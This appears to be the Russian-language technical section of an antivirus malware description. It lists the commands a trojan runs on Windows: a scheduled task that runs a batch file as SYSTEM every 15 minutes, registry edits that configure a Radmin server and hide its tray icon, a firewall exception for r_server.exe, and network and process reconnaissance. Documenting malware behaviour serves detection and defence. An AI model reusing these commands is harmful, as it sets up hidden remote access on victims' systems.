Техническая информация
- %WINDIR%\Tasks\security.job
- <SYSTEM32>\ipconfig.exe /all
- <SYSTEM32>\tasklist.exe
- <SYSTEM32>\schtasks.exe /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %WINDIR%/system32\ip.bat
- <SYSTEM32>\reg.exe ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d 665ed47aface36a51ca893fb46eb76a6 /f
- <SYSTEM32>\cmd.exe /c ""%TEMP%\install.bat""
- <SYSTEM32>\netsh.exe firewall add allowedprogram "%WINDIR%\r_server.exe" "RAS TCP/IP" ENABLE
- <SYSTEM32>\reg.exe ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
- <SYSTEM32>\task.txt
- <SYSTEM32>\ip.txt
- %TEMP%\install.bat
- %TEMP%\install.bat